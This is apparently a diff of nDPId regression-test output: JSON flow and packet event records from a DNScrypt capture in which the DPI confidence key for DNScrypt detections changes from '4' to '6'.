AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":462,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380805,"flow_last_seen":946739380805,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739380805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":60885,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":462,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380805,"flow_last_seen":946739380805,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739380805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":60885,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection 
failed","datalink":1,"packet_id":463,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739380805} 00422{"packet_event_id":1,"packet_event_name":"packet","packet_id":463,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739380805,"pkt":"REREREREZmZmZmZmCABFAABQ\/YoAuX4RxOQKAAAB1C\/kiAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00708{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":464,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":181,"flow_packet_id":2,"flow_last_seen":946739380832,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":946739380832,"pkt":"ZmZmZmZmRERERERECABFAADWpUBAADIRKWLUL+SICgAAAQG7leMAwtNqbd6BgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAJmcghkbnNjcnlwdANvcmcAABAAAcAMABAAAQAAcIAAfXxETlNDAAIAAAGnqbCRK7WvFnA0fqnvTaP0TkhGLYlM337fP\/M0VQi0o3wTy7gpqyMQZFkjfrWn031Ofm4JJLwM1X8FbNxmrQCWUcFQ8RQkVXWSFLecisgk5xXaKVbLy2ZX6VNRztvrCJZRwVDxFCRVAAAAAV9ToghfVPOI"} 
@@ -940,24 +940,24 @@ 00708{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":469,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":184,"flow_packet_id":2,"flow_last_seen":946739380844,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":946739380844,"pkt":"ZmZmZmZmRERERERECABFAADWpUVAADIRKV3UL+SICgAAAQG7n0cAwsoEbeCBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAJmcghkbnNjcnlwdANvcmcAABAAAcAMABAAAQAAcIAAfXxETlNDAAIAAAGnqbCRK7WvFnA0fqnvTaP0TkhGLYlM337fP\/M0VQi0o3wTy7gpqyMQZFkjfrWn031Ofm4JJLwM1X8FbNxmrQCWUcFQ8RQkVXWSFLecisgk5xXaKVbLy2ZX6VNRztvrCJZRwVDxFCRVAAAAAV9ToghfVPOI"} 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":470,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380983,"flow_last_seen":946739380983,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739380983,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":58948,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01144{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":470,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":187,"flow_packet_id":1,"flow_last_seen":946739380983,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739380983,"pkt":"REREREREZmZmZmZmCABFAAIcVMVAAH4RMmQKAAABVQVd5uZEIPsCCHXB4\/IBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhpYmtzdHVybQAAEAABAAAAAAAAAAAAAcsADAHHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":470,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380983,"flow_last_seen":946739380983,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739380983,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":58948,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":470,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380983,"flow_last_seen":946739380983,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739380983,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":58948,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":471,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380983,"flow_last_seen":946739380983,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739380983,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":50403,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01144{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":471,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":188,"flow_packet_id":1,"flow_last_seen":946739380983,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739380983,"pkt":"REREREREZmZmZmZmCABFAAIcCx1AAH4RfAwKAAABVQVd5sTjIPsCCHXB4\/ABAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhpYmtzdHVybQAAEAABAAAAAAAAAAAAAcsADAHHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":471,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380983,"flow_last_seen":946739380983,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739380983,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":50403,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":471,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380983,"flow_last_seen":946739380983,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739380983,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":50403,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":472,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380983,"flow_last_seen":946739380983,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739380983,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":46646,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":189,"flow_packet_id":1,"flow_last_seen":946739380983,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739380983,"pkt":"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"} 
-00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":472,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380983,"flow_last_seen":946739380983,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739380983,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":46646,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":472,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380983,"flow_last_seen":946739380983,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739380983,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":46646,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":473,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380984,"flow_last_seen":946739380984,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739380984,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":57090,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":473,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":190,"flow_packet_id":1,"flow_last_seen":946739380984,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739380984,"pkt":"REREREREZmZmZmZmCABFAAXcVMcgAH4RTqIKAAABVQVd5t8CIPsGBKCC4+8BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhpYmtzdHVybQAAEAABAAAAAAAAAAAABccADAXDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":473,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380984,"flow_last_seen":946739380984,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739380984,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":57090,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":473,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380984,"flow_last_seen":946739380984,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739380984,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":57090,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":474,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739380984} 
00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":474,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739380984,"pkt":"REREREREZmZmZmZmCABFAABQVMcAuX4Rc3UKAAABVQVd5gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":475,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380984,"flow_last_seen":946739380984,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739380984,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":51826,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02427{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":475,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":1,"flow_last_seen":946739380984,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739380984,"pkt":"REREREREZmZmZmZmCABFAAXcVMkgAH4RTqAKAAABVQVd5spyIPsGBLUQ4\/EBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhpYmtzdHVybQAAEAABAAAAAAAAAAAABccADAXDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":475,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380984,"flow_last_seen":946739380984,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739380984,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":51826,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 